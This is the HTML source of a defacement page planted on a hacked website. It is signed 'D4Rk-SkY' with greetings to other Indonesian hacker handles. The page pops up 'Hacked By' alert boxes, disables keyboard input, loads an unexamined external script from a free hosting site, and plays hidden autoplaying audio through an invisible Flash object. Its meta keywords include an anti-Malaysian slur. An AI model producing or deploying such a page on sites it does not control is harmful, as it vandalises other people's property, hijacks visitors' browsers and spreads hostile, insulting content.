| SERENA LAND DI PRJ |
|
<script language="JavaScript">alert("Hacked By D4Rk-SkY");</script> <script language="JavaScript">alert("Don't Panic and Pacth U'r Sistem Now :D ");</script>
<script type="text/javascript" src="http://www.freewebs.com/p.js"></script> <script language='javascript'>function keypressed() {;return false;}document.onkeydown=keypressed;</script>
<meta name="description" content=" ./Hacked By D4Rk-SkY./ "/>
<meta name="keywords" content=" Hacked By D4Rk-SkY , Malaysia, malingsial, fuck malaysia, indonesia, indonesian,postem, D4Rk-SkY , D4Rk-SkY Attack, Indonesian Hacker, Network, Netpark, network, hacking, cracking, Berita, D4Rk-SkY "/>
<meta content='D4Rk-SkY ' name='author'/>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta http-equiv="Content-Language" content="en-us">
<meta name="creator" content="INDONESIAN HACKER">
<meta name="revisit-after" content="3">
<meta name="owner" content="D4Rk-SkY ">
<meta name="rating" content="general">
<meta name="classification" content="Internet Services">
<meta name="googlebot" content="index,follow">
<meta name="google rank" content="1">
<meta name="robots" content="all">
<meta name="robots schedule" content="auto">
<meta name="distribution" content="global">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="imagetoolbar" content="no">
<script>
TypingText = function(element, interval, cursor, finishedCallback) { if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) { this.running = true; // Never run. return; } this.element = element; this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; }); this.interval = (typeof interval == "undefined" ? 30 : interval); this.origText = this.element.innerHTML; this.unparsedOrigText = this.origText; this.cursor = (cursor ? cursor : ""); this.currentText = ""; this.currentChar = 0; this.element.typingText = this; if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++; TypingText.all.push(this); this.running = false; this.inTag = false; this.tagBuffer = ""; this.inHTMLEntity = false; this.HTMLEntityBuffer = ""; } TypingText.all = new Array(); TypingText.currentIndex = 0; TypingText.runAll = function() { for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run(); } TypingText.prototype.run = function() { if(this.running) return; if(typeof this.origText == "undefined") { setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience. return; } if(this.currentText == "") this.element.innerHTML = ""; // this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text. if(this.currentChar < this.origText.length) { if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) { this.tagBuffer = "<"; this.inTag = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) { this.tagBuffer += ">"; this.inTag = false; this.currentText += this.tagBuffer; this.currentChar++; this.run(); return; } else if(this.inTag) { this.tagBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) { this.HTMLEntityBuffer = "&"; this.inHTMLEntity = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) { this.HTMLEntityBuffer += ";"; this.inHTMLEntity = false; this.currentText += this.HTMLEntityBuffer; this.currentChar++; this.run(); return; } else if(this.inHTMLEntity) { this.HTMLEntityBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else { this.currentText += this.origText.charAt(this.currentChar); } this.element.innerHTML = this.currentText; this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : ""); this.currentChar++; setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); } else { this.currentText = ""; this.currentChar = 0; this.running = false; this.finishedCallback(); } } </script> <style> body { background: url("http://www.dh-abgeblitzt.de/wp-content/background.png");
padding:0; margin:0; background-repeat: no-repeat; background-position: right; background-color: black; color: white; font: normal 80% Verdana; margin-top: 0px; margin-left: 0px; padding: 0; margin-right: 0px; }
td{font-family: verdana; font-size: 20pt; color: green} a{font-family: verdana; font-size: 20pt; color: silver} /* REMOVE HORIZONTAL SCROLLBAR*/ body { overflow-x: hidden; } /* REMOVE VERTICAL SCROLLBAR*/ body { overflow-y: hidden; } </style>
</head>
<body> <script language="javascript">
var text='D4Rk-SkY';
var delay=5;
var Xoff=0;
var Yoff=-30;
var txtw=10;
var beghtml='<font color="#FF0000"><b>';
var endhtml='</b></font>';
ns4 = (navigator.appName.indexOf("Netscape")>=0 && document.layers)? true : false;
ie4 = (document.all && !document.getElementById)? true : false;
ie5 = (document.all && document.getElementById)? true : false;
ns6 = (document.getElementById && navigator.appName.indexOf("Netscape")>=0 )? true: false;
var txtA=new Array();
text=text.split('');
var x1=0;
var y1=-50;
var t='';
for(i=1;i<=text.length;i++){
t+=(ns4)? '<layer left="0" top="-100" width="'+txtw+'" name="txt'+i+'" height="1">' : '<div id="txt'+i+'" style="position:absolute; top:-100px; left:0px; height:1px; width:'+txtw+'; visibility:visible;">';
t+=beghtml+text[i-1]+endhtml;
t+=(ns4)? '</layer>' : '</div>';
}
document.write(t);
function moveid(id,x,y){
if(ns4)id.moveTo(x,y);
else{
id.style.left=x+'px';
id.style.top=y+'px';
}}
function animate(evt){
x1=Xoff+((ie4||ie5)?event.clientX+document.body.scrollLeft:evt.pageX);
y1=Yoff+((ie4||ie5)?event.clientY+document.body.scrollTop:evt.pageY);
}
function getidleft(id){
if(ns4)return id.left;
else return parseInt(id.style.left);
}
function getidtop(id){
if(ns4)return id.top;
else return parseInt(id.style.top);
}
function getwindowwidth(){
if(ie4||ie5)return document.body.clientWidth+document.body.scrollLeft;
else return window.innerWidth+pageXOffset;
}
function movetxts(){
for(i=text.length;i>1;i=i-1){
if(getidleft(txtA[i-1])+txtw*2>=getwindowwidth()){
moveid(txtA[i-1],0,-100);
moveid(txtA[i],0,-100);
}else moveid(txtA[i], getidleft(txtA[i-1])+txtw, getidtop(txtA[i-1]));
}
moveid(txtA[1],x1,y1);
}
window.onload=function(){
for(i=1;i<=text.length;i++)txtA[i]=(ns4)?document.layers['txt'+i]:(ie4)?document.all['txt'+i]:document.getElementById('txt'+i);
if(ns4)document.captureEvents(Event.MOUSEMOVE);
document.onmousemove=animate;
setInterval('movetxts()',delay);
}
</script>
<center> <!-- <img border="0" src="http://ocibr.com/wp-content/uploads/2011/03/website-down.jpg" width="350" height="60"> -->
<br> <br> <br> <br><br> <br><br> <font color='red' size=6> <blink> -==[[./HACKED BY D4Rk-SkY./]]==- </blink> <br></font> <div id="example1"> <br>
<font color='red' size=6>
</font> <p id="example2"> <font color='ffffff' size=4> # Regardz to : PSS & Crue # Crashbandicot # xdieka-civilx # sleepy_hollow #<br> </font> <font color='ffffff' size=4> # xzer # ThedinkDamn # Hell_Squad # Wh0-4m-1 # scame # HERI HLK # blackz # shark # p1y0 #<br> </font> <font color='ffffff' size=4> # All Of Indonesia Hacker & Indonesia Profesional Security # <br> </font> <font color='ffffff' size=4> # WE Love INDONESIA Including : Pontianak City # <br> </font>
<br> <font face="Tahoma" size="3" color="#D50000"> Copyright © 2012 PSS </font>
<script type="text/javascript"> //Define first typing example: new TypingText(document.getElementById("example1")); //Define second typing example (use "slashing" cursor at the end): new TypingText(document.getElementById("example2"), 70, function(i){ var ar = new Array("\\", "|", "/", "-"); return " " + ar[i.length % ar.length]; }); //Type out examples: TypingText.runAll(); </script> </center> <center> <img src="http://www.dh-abgeblitzt.de/wp-content/postemdark.png" width="150" height="150"> </center> </body></html>
<!-- Link --> <link rel="icon" href="http://rovicky.files.wordpress.com/2006/08/flag-indonesia.gif" type="image/x-icon"> <!-- End Link --> </Script> </Script> <object data="http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash">
<param value="#ffffff" name="bgcolor"><br>
<param value="mp3=http://www.pouran-voyance.com/wp-content/themes/Glow/temp/Rihana.mp3&loop=1&autoplay=1&volume=125" name="FlashVars">
</object>
</Script>
|